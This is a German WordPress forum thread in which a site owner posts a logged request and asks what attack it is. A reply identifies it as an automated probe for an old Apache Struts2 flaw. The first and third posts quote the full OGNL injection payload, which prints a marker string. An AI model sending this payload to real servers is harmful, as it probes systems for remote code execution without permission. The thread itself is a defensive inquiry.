Weitere Informationen und den Download findest du auf der offiziellen Anlaufstelle de.wordpress.org
Ergebnis 1 bis 4 von 4
  1. #1
    PostRank: 0
    Registriert seit
    15.01.2005
    Beiträge
    13

    Was ist das für eine Attacke auf WP ?

    Heute im Logfile gefunden:
    mein_wp/category/salzburg/?redirect:$%7B%23matt%3d%20%23context.get('com.ope nsymphony.xwork2.dispatcher.HttpServletResponse'), %23matt.setContentType('text/plain'),%23matt.getWriter().println%20('successsuc ce

    Folgende Website dazu gefunden:
    http://ddecode.com/hexdecoder/?resul...538ef8f8365474

    Was ist das für ein Angriff bzw. Angriffs-Versuch ?

    Bitte um / thx vorab für zielführende Hinweise.
    Josef


  2. #2
    PostRank: 10 Avatar von Hille
    Registriert seit
    22.01.2012
    Beiträge
    7.430
    Poste mal den kompletten Logauszug

  3. #3
    PostRank: 0
    Registriert seit
    15.01.2005
    Beiträge
    13
    119.28.67.89 - - [01/Jul/2017:13:08:48 +0200]
    "GET /category/salzburg/?redirect:$%7B%23matt%3d%20%23context.get('com.ope nsymphony.xwork2.dispatcher.HttpServletResponse'), %23matt.setContentType('text/plain'),%23matt.getWriter().println%20('successsuc cess'),%23matt.getWriter().flush(),%23matt.getWrit er().close()%7D HTTP/1.1"
    200 77641 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0"


    Hille, thx für die Rückmeldung.

    Oben ist der Logfile-Eintrag, zur besseren Übersicht hier aufgeteilt in mehrere Zeilen.
    Der Code 200 am Anfang der letzten Zeile sagt: Seite erreicht.


    Wenn ich den Query-String ab ?redirect in das Suchfeld von trojaner-board.de eingebe, kommt die Meldung:

    about:blank : Unable to run script because scripts are blocked internally. (unbekannt)
    [NoScript InjectionChecker] JavaScript Injection in ///cse?cx=partner-pub-0879914387367977:4sv7c8wzsx0&ie=ISO-8859-1&q=?redirect:${#matt= #context.get('com.opensymphony.xwork2.dispatcher.H ttpServletResponse'),#matt.setContentType('text/plain'),#matt.getWriter().println ('successsuccess'),#matt.getWriter().flush(),#matt .getWriter().close()} HTTP/1.1"&sa=Suche
    (function anonymous(
    ) {
    context.get('com.opensymphony.xwork2.dispatcher.Ht tpServletResponse'), /* COMMENT_TERMINATOR */
    DUMMY_EXPR
    })
    [NoScript XSS] Eine verdächtige Anfrage wurde bereinigt. Original-URL [http://www.google.de/cse?cx=partner-...1%22&sa=Suche] angefordert von [http://www.trojaner-board.de/]. Bereinigte URL: [http://www.google.de/cse?cx=partner-...8359747811736].
    Gemischte (unsichere) Anzeige-Inhalte von "http://www.trojaner-board.de/1.jpg" werden auf einer sicheren Seite geladen[Weitere Informationen] cse
    about:blank : Unable to run script because scripts are blocked internally. (unbekannt)
    about:blank : Unable to run script because scripts are blocked internally.


    Ich habe in meiner WP-Kategorie "Salzburg" via phpMyAdmin einige Einträge angeschaut, aber nichts Auffälliges gefunden.


    Gruss
    Josef

  4. #4
    PostRank: 10 Avatar von b3317133
    Registriert seit
    21.11.2014
    Beiträge
    1.747
    Das war ein tagtäglich erfolgender automatisierter versuchter Angriff auf eine einige Jahre alte Lücke in struts2, mehr dazu hier.

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •